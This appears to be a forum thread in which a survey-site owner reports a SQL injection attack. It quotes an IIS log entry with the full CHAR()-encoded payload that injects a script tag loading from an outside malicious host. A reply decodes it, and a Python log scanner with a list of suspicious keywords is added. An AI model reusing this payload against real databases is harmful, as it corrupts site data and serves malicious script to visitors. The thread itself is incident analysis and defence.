We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website.
I found multiple entries in our IIS logs that included the malicious code:
< / title> < script src = http : // google-stats49.info/ur.php >.
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
Does anyone have any suggestions on how to prevent this from happening?
CHAR(n) is a TSQL function that turns an int into an ASCII character. This is what the above sample contains:

    </title><script src=http://google-stats50.info/ur.php></script>

so try it out:

    print char(60)+char(47)+char(116)+char(105)+char(116)+char(108)
         +char(101)+char(62)+char(60)+char(115)+char(99)+char(114)
         +char(105)+char(112)+char(116)+char(32)+char(115)+char(114)
         +char(99)+char(61)+char(104)+char(116)+char(116)+char(112)
         +char(58)+char(47)+char(47)+char(103)+char(111)+char(111)
         +char(103)+char(108)+char(101)+char(45)+char(115)+char(116)
         +char(97)+char(116)+char(115)+char(53)+'...'

– KM.
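The decoding KM describes, automated over an IIS cs-uri-query value, as an added example that is not from the question or the answer: it URL-decodes the field, replaces each CHAR(n)+CHAR(m)+... chain with the text it builds, and flags entries that carry a DML keyword, a comment terminator or markup. The sample entry is constructed (a shortened version of the one quoted in the question) and the marker list is an assumption, not a complete signature.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample cs-uri-query value, shortened from the entry quoted in the
# question; the CHAR() chain here only spells out "</title><script".
SAMPLE_QUERY = (
    "surveyID=91+update+usd_ResponseDetails+set+categoryName="
    "REPLACE(cast(categoryName+as+varchar(8000)),cast("
    "char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)"
    "%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)"
    "+as+varchar(8000)),cast(char(32)+as+varchar(8)))--"
)

# A run of CHAR(n)+CHAR(m)+...; \b keeps "varchar(8000)" from matching.
CHAR_CHAIN = re.compile(r"\bchar\(\d+\)(?:\s*\+\s*\bchar\(\d+\))*", re.IGNORECASE)
CHAR_CALL = re.compile(r"\bchar\((\d+)\)", re.IGNORECASE)

# Assumed set of markers worth flagging in a query-string parameter.
MARKERS = ("update", "insert", "delete", "exec", "--", "<script")


def decode_char_chains(sql: str) -> str:
    """Replace every CHAR(n)+CHAR(m)+... chain with the quoted text it builds."""
    def build(match: re.Match) -> str:
        codes = [int(n) for n in CHAR_CALL.findall(match.group(0))]
        if any(c > 255 for c in codes):      # T-SQL CHAR() only takes 0-255
            return match.group(0)            # leave anything else untouched
        return "'" + "".join(chr(c) for c in codes) + "'"
    return CHAR_CHAIN.sub(build, sql)


def analyse_query(cs_uri_query: str) -> dict:
    """URL-decode an IIS cs-uri-query value and expose the SQL/HTML it hides."""
    decoded = unquote_plus(cs_uri_query)     # '+' -> space, %2B -> '+'
    readable = decode_char_chains(decoded)
    lowered = readable.lower()
    hits = [m for m in MARKERS if m in lowered]
    return {"readable": readable, "suspicious": bool(hits), "markers": hits}


if __name__ == "__main__":
    result = analyse_query(SAMPLE_QUERY)
    print(result["readable"])
    print("suspicious:", result["suspicious"], result["markers"])
```

Running it over the IIS log's cs-uri-query column shows each injected statement in plain text, which makes it clear which tables and columns the attacker overwrote.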